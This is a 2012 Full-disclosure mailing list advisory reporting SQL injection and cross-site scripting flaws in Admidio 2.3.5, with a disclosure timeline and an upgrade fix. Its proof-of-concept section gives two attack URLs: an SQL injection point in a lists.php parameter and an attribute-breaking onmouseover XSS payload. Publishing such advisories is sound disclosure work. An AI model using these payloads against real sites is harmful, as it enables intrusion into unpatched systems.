[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Admidio 2.3.5 Multiple security vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Admidio 2.3.5 Multiple security vulnerabilities
- From: Stefan Schurtz <sschurtz@xxxxxxxxxxx>
- Date: Sat, 01 Sep 2012 10:36:33 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: Admidio 2.3.5 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-019
Author: Stefan Schurtz
Affected Software: Successfully tested on Admidio 2.3.5
Vendor URL: http://www.admidio.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities
==================
PoC-Exploit
==================
//SQLi
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline="
onmouseover=alert(/xss/) "
=========
Solution
=========
Upgrade to the latest version 2.3.6
====================
Disclosure Timeline
====================
21-Aug-2012 - developer informed
21-Aug-2012 - feedback from developer
28-Aug-2012 - fixed in version 2.3.6
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.admidio.org/forum/viewtopic.php?t=5108
http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAlBByQ4ACgkQg3svV2LcbMC4kwCeK+vGuSrJ4qHy2ILFE8arppud
gjgAn3eJnDuVB94NXFAbVZUraLUcjlVq
=wJLS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/